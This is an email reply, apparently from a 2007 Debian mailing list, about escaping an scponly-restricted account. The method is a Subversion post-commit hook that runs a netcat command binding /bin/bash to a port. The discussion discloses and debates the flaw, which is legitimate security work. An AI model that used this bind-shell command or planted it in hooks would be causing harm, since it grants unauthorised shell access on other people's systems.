Hi, Am Sonntag, den 12.08.2007, 07:58 +0200 schrieb Florian Weimer: > * Joachim Breitner: > > > messing around with some friends here, I tried to access his computer > > with only a scponly protected account. I discovered this way of gaining > > full shell access: > > > > I locally created a subversion repository /tmp/blubb with > > a /tmp/blubb/hooks/post-commit that contains the command: > > ( nc -l -p 1042 -e /bin/bash) & > > This is an unfortunate interaction between scponly and Subversion, but > not a real bug in any of the programs. The same problem arises when a > scponly-restricted user uploads any form of executable contents. CGI > scripts are more common (and their so-called "PHP shells" which are > explicitly designed to exploit this).
I think it’s more than that. If I upload some executable, I still have to find a way to actually execute it (e.g. a badly configured web server). Using subversion, I execute anything in _any case_, making scponly useless for it’s purpose. Greetings, Joachim -- Joachim "nomeata" Breitner Debian Developer [EMAIL PROTECTED] | ICQ# 74513189 | GPG-Keyid: 4743206C JID: [EMAIL PROTECTED] | http://people.debian.org/~nomeata
